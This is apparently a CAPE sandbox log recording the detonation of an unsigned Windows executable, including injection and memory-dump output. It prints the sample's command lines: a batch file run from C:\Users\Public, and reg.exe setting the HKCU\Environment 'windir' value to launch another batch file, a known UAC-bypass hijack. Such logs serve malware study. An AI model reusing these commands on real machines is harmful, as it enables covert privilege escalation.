Analysis

Category: FILE
Package: exe
Started: 2020-03-24 10:13:01
Completed: 2020-03-24 10:17:21
Duration: 260 seconds

Options:
procmemdump = 1
import_reconstruction = 1
procdump = 1
route = internet

Log:
2020-03-24 10:13:02,000 [root] INFO: Date set to: 03-24-20, time set to: 10:13:02, timeout set to: 200
2020-03-24 10:13:02,108 [root] DEBUG: Starting analyzer from: C:\lwhhhat
2020-03-24 10:13:02,108 [root] DEBUG: Storing results at: C:\uGrmFZ
2020-03-24 10:13:02,108 [root] DEBUG: Pipe server name: \\.\PIPE\pOpDnJNJHI
2020-03-24 10:13:02,108 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-03-24 10:13:02,108 [root] INFO: Automatically selected analysis package "exe"
2020-03-24 10:13:05,775 [root] DEBUG: Started auxiliary module Browser
2020-03-24 10:13:05,775 [root] DEBUG: Started auxiliary module Curtain
2020-03-24 10:13:05,775 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2020-03-24 10:13:08,348 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-03-24 10:13:08,348 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-03-24 10:13:08,348 [root] DEBUG: Started auxiliary module DigiSig
2020-03-24 10:13:08,348 [root] DEBUG: Started auxiliary module Disguise
2020-03-24 10:13:08,348 [root] DEBUG: Started auxiliary module Human
2020-03-24 10:13:08,348 [root] DEBUG: Started auxiliary module Screenshots
2020-03-24 10:13:08,348 [root] DEBUG: Started auxiliary module Sysmon
2020-03-24 10:13:08,348 [root] DEBUG: Started auxiliary module Usage
2020-03-24 10:13:08,348 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2020-03-24 10:13:08,348 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2020-03-24 10:13:08,411 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\iz3Ehm6t.exe" with arguments "" with pid 1964
2020-03-24 10:13:08,411 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:08,411 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:08,411 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:08,411 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:08,519 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:08,519 [root] DEBUG: Loader: Injecting process 1964 (thread 420) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:08,536 [root] DEBUG: Process image base: 0x00400000
2020-03-24 10:13:08,536 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:08,536 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:08,536 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:08,536 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1964
2020-03-24 10:13:10,548 [lib.api.process] INFO: Successfully resumed process with pid 1964
2020-03-24 10:13:10,548 [root] INFO: Added new process to list with pid: 1964
2020-03-24 10:13:10,891 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 10:13:10,891 [root] DEBUG: Full process memory dumps enabled.
2020-03-24 10:13:10,891 [root] DEBUG: Import reconstruction of process dumps enabled.
2020-03-24 10:13:10,891 [root] DEBUG: Process dumps enabled.
2020-03-24 10:13:11,125 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:11,125 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:11,125 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 10:13:11,125 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:11,125 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:11,125 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1964 at 0x74880000, image base 0x400000, stack from 0x186000-0x190000
2020-03-24 10:13:11,125 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\iz3Ehm6t.exe".
2020-03-24 10:13:11,125 [root] INFO: Monitor successfully loaded in process with pid 1964.
2020-03-24 10:13:11,125 [root] DEBUG: set_caller_info: Adding region at 0x03660000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:12,046 [root] DEBUG: set_caller_info: Adding region at 0x03F60000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:12,062 [root] DEBUG: set_caller_info: Adding region at 0x040E0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:12,062 [root] DEBUG: set_caller_info: Adding region at 0x046B0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:12,092 [root] DEBUG: set_caller_info: Adding region at 0x04830000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:12,140 [root] DEBUG: set_caller_info: Adding region at 0x04940000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:12,201 [root] DEBUG: set_caller_info: Adding region at 0x04A40000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:12,249 [root] DEBUG: set_caller_info: Adding region at 0x04B40000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:12,358 [root] DEBUG: set_caller_info: Adding region at 0x04A50000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:12,763 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\shell32 (0xc4a000 bytes).
2020-03-24 10:13:12,997 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\syswow64\URLMON (0x136000 bytes).
2020-03-24 10:13:13,496 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2020-03-24 10:13:13,621 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2020-03-24 10:13:13,714 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2020-03-24 10:13:13,714 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2020-03-24 10:13:13,792 [root] DEBUG: set_caller_info: Adding region at 0x035A0000 to caller regions list (ntdll::memcpy).
2020-03-24 10:13:13,792 [root] DEBUG: set_caller_info: Adding region at 0x04B60000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:13,792 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 10:13:14,058 [root] INFO: Announced 32-bit process name: cmd.exe pid: 1340
2020-03-24 10:13:14,058 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:14,058 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:14,058 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:14,058 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:14,073 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:14,073 [root] DEBUG: Loader: Injecting process 1340 (thread 2288) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,073 [root] DEBUG: Process image base: 0x4A1A0000
2020-03-24 10:13:14,073 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,073 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:14,073 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,073 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1340
2020-03-24 10:13:14,073 [root] INFO: Announced 32-bit process name: cmd.exe pid: 1340
2020-03-24 10:13:14,073 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:14,073 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:14,073 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:14,073 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:14,073 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:14,073 [root] DEBUG: Loader: Injecting process 1340 (thread 2288) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,073 [root] DEBUG: Process image base: 0x4A1A0000
2020-03-24 10:13:14,073 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,073 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:14,073 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,073 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1340
2020-03-24 10:13:14,089 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 10:13:14,089 [root] DEBUG: Full process memory dumps enabled.
2020-03-24 10:13:14,089 [root] DEBUG: Import reconstruction of process dumps enabled.
2020-03-24 10:13:14,089 [root] DEBUG: Process dumps enabled.
2020-03-24 10:13:14,089 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:14,105 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 10:13:14,105 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1340 at 0x74880000, image base 0x4a1a0000, stack from 0x363000-0x460000
2020-03-24 10:13:14,105 [root] DEBUG: Commandline: C:\Users\Public\cmd \c ""C:\Users\Public\Natso.bat" ".
2020-03-24 10:13:14,105 [root] INFO: Added new process to list with pid: 1340
2020-03-24 10:13:14,105 [root] INFO: Monitor successfully loaded in process with pid 1340.
2020-03-24 10:13:14,369 [root] INFO: Announced 32-bit process name: reg.exe pid: 2352
2020-03-24 10:13:14,369 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:14,369 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:14,369 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:14,369 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:14,369 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:14,369 [root] DEBUG: Loader: Injecting process 2352 (thread 2216) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,369 [root] DEBUG: Process image base: 0x00E30000
2020-03-24 10:13:14,369 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,369 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:14,369 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,369 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2352
2020-03-24 10:13:14,385 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 10:13:14,401 [root] INFO: Announced 32-bit process name: reg.exe pid: 2352
2020-03-24 10:13:14,401 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:14,401 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:14,401 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:14,401 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:14,401 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:14,401 [root] DEBUG: Loader: Injecting process 2352 (thread 2216) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,401 [root] DEBUG: Process image base: 0x00E30000
2020-03-24 10:13:14,401 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,401 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:14,401 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:14,401 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2352
2020-03-24 10:13:14,588 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 10:13:14,588 [root] DEBUG: Full process memory dumps enabled.
2020-03-24 10:13:14,588 [root] DEBUG: Import reconstruction of process dumps enabled.
2020-03-24 10:13:14,588 [root] DEBUG: Process dumps enabled.
2020-03-24 10:13:14,588 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:14,713 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 10:13:14,713 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2352 at 0x74880000, image base 0xe30000, stack from 0x206000-0x210000
2020-03-24 10:13:14,713 [root] DEBUG: Commandline: C:\Users\Public\reg  delete hkcu\Environment \v windir \f.
2020-03-24 10:13:14,713 [root] INFO: Added new process to list with pid: 2352
2020-03-24 10:13:14,713 [root] INFO: Monitor successfully loaded in process with pid 2352.
2020-03-24 10:13:14,713 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2352
2020-03-24 10:13:14,713 [root] DEBUG: GetHookCallerBase: thread 2216 (handle 0x0), return address 0x00E31CAD, allocation base 0x00E30000.
2020-03-24 10:13:14,713 [root] DEBUG: DoProcessDump: Created dump file for full process memory dump: C:\uGrmFZ\memory\2352.dmp.
2020-03-24 10:13:14,931 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00E30000.
2020-03-24 10:13:14,931 [root] DEBUG: ApiReader: module list size: 20
2020-03-24 10:13:14,931 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,931 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,947 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:14,947 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:14,993 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:14,993 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:14,993 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:14,993 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:14,993 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:15,009 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:15,009 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:15,026 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:15,026 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:15,026 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:15,026 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,088 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:15,088 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:13:15,088 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:13:15,088 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:15,088 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:15,088 [root] DEBUG: DumpProcessFixImports: Instantiating PeParser with address: 0x00E30000
2020-03-24 10:13:15,088 [root] DEBUG: DumpProcessFixImports: Module entry point VA is 0x00E31BCA
2020-03-24 10:13:15,088 [root] DEBUG: Module image dump success
2020-03-24 10:13:15,088 [root] DEBUG: DumpProcessFixImports: Found IAT - 0xe30ffc, size: 0x1ec
2020-03-24 10:13:15,088 [root] DEBUG: IAT parsing finished, found 116 valid APIs, missed 0 APIs
2020-03-24 10:13:15,104 [root] DEBUG: Adding module to module list: advapi32.dll
2020-03-24 10:13:15,104 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:15,104 [root] DEBUG: Adding module to module list: msvcrt.dll
2020-03-24 10:13:15,104 [root] DEBUG: Adding module to module list: ntdll.dll
2020-03-24 10:13:15,104 [root] DEBUG: Adding module to module list: user32.dll
2020-03-24 10:13:15,104 [root] DEBUG: Adding module to module list: ws2_32.dll
2020-03-24 10:13:15,104 [root] DEBUG: Adding module to module list: shlwapi.dll
2020-03-24 10:13:15,104 [root] DEBUG: Warning - IAT is not inside the PE image, requires rebasing.
2020-03-24 10:13:15,104 [root] DEBUG: Invalid PE file: import table rebuild failed.
2020-03-24 10:13:15,104 [root] DEBUG: Import table rebuild failed, falling back to unfixed dump.
2020-03-24 10:13:15,104 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\2352_114937640815132024232020
2020-03-24 10:13:23,917 [root] DEBUG: DoProcessDump: Full process memory dump saved to file: C:\uGrmFZ\memory\2352.dmp.
2020-03-24 10:13:23,917 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 10:13:23,917 [root] INFO: Notified of termination of process with pid 2352.
2020-03-24 10:13:23,933 [root] INFO: Announced 32-bit process name: reg.exe pid: 1592
2020-03-24 10:13:23,933 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:23,933 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:23,933 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:23,933 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:23,980 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:23,980 [root] DEBUG: Loader: Injecting process 1592 (thread 856) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:23,980 [root] DEBUG: Process image base: 0x00C80000
2020-03-24 10:13:23,980 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:23,980 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:23,980 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:23,996 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1592
2020-03-24 10:13:23,996 [root] INFO: Announced 32-bit process name: reg.exe pid: 1592
2020-03-24 10:13:23,996 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:23,996 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:23,996 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:23,996 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:24,010 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:24,010 [root] DEBUG: Loader: Injecting process 1592 (thread 856) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:24,010 [root] DEBUG: Process image base: 0x00C80000
2020-03-24 10:13:24,010 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:24,010 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:24,026 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:24,026 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1592
2020-03-24 10:13:24,026 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 10:13:24,042 [root] DEBUG: Full process memory dumps enabled.
2020-03-24 10:13:24,042 [root] DEBUG: Import reconstruction of process dumps enabled.
2020-03-24 10:13:24,058 [root] DEBUG: Process dumps enabled.
2020-03-24 10:13:24,058 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:24,073 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 10:13:24,073 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1592 at 0x74880000, image base 0xc80000, stack from 0x166000-0x170000
2020-03-24 10:13:24,073 [root] DEBUG: Commandline: C:\Users\Public\reg  add hkcu\Environment \v windir \d "cmd \c start \min  C:\Users\Public\Yako.bat reg  delete hkcu\Environment \v windir \f && REM ".
2020-03-24 10:13:24,073 [root] INFO: Added new process to list with pid: 1592
2020-03-24 10:13:24,073 [root] INFO: Monitor successfully loaded in process with pid 1592.
2020-03-24 10:13:24,073 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1592
2020-03-24 10:13:24,088 [root] DEBUG: GetHookCallerBase: thread 856 (handle 0x0), return address 0x00C81CAD, allocation base 0x00C80000.
2020-03-24 10:13:24,088 [root] DEBUG: DoProcessDump: Created dump file for full process memory dump: C:\uGrmFZ\memory\1592.dmp.
2020-03-24 10:13:25,150 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00C80000.
2020-03-24 10:13:25,150 [root] DEBUG: ApiReader: module list size: 20
2020-03-24 10:13:25,150 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,165 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:25,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:25,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,180 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,180 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,180 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,197 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,197 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,211 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,211 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,211 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,211 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,211 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,211 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,211 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,211 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,211 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
